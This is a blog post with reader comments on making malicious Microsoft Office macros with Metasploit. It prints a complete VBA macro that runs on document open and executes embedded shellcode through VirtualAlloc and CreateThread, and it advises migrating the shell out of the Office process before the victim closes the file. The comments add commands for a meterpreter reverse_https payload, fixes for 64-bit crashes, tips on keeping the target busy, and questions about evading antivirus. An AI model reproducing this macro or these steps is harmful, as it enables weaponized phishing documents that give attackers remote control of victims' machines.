scriptjunkie recently had a post on
Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.
msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.
14 comments:
Used this on a test yestaurday... worked like a charm :P
One thing to note though, def migrate immediately via an RC script or something.. Shell dies with the document so have enough info in the document to keep the person busy for a minute..
Also here is another method using shellcode exec, just make sure to create a version of shellcode exec that bypasses AV when downloaded.
http://huptwo34.blogspot.com/2012/01/winning-with-vba-macros.html
Great post! Been looking to do this for a while. When I tried to something beside open up calc (Like generating a meterpreter payload using msfvenom) I get very similar vba code but it just crashes Word 2010.
Any suggestions on how to get a useful payload to work this way?
i used his template on the blog post with EXCEL 2010 but in meterpreter https and it worked with no problems (win7 64bit).
if i have some time i'll try with word
Thanks! it worked using that method in Word 2010 (not using msfvenom)
Very cool. I used to use this method using shellcode2vbscript.py
from the coresec blog
but now I have a new method!
CG, could you share how did you reverse https with the xls provided from the blog?
It would be really interesting to know.
Would appreciate it.
Rgds.
the same way as in the post
just do a:
msf > use payload/windows/meterpreter/reverse_https
fill in options
generate -t vba
Got it ! Wow...and u r right, it works with the xls provided on the blog.
Tks so much bro.
Rgds.
P.S.
Fails with Office 2007 because VB is not installed by default on it.
I've noticed that this crashes Word 2010. Any idea why (Win7 64-bit)?
Seems to work fine on Word 2007 (WinXP).
Thanks!
works fine for me win7 64 bit
i have seen it crash when the handler cant be reached though.
I tried this and it worked on my system but when try testing on another system it doesn't work. I mean i create .doc with VBA on PC1 and test on PC2 it doesn't work, it only work on the system i create it on.
Anyone have an idea what might be wrong?
are the architectures the same?
Hey Folks - just wanted to share the comment scriptjunkie made with regard to this crashing on Win7 running Office 2007 (found here: http://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/):
Maybe it’s trying to run 32 bit shellcode which crashes in a 64 bit process? Generate a 64 bit calc with windows/x64/exec, and see if that works. You should also be able to set up a x64 and x86 handler, and put both payloads into one doc with something like this around the shellcode:
#if Win64 then
‘ Code is running in 64-bit version of Microsoft Office
#else
‘ Code is running in 32-bit version of Microsoft Office
#end if
then it should work in both versions. But I don’t have a 64 bit office to test. :-/ Otherwise it’s just break out the windbg and see what happens.
I haven't got it working yet, but thought I'd share and see if anyone else might have figured this one out.
Works well , the only problem is , it gets detected by AVS .Does anyone know any AV evasion methods for this script ?
Post a Comment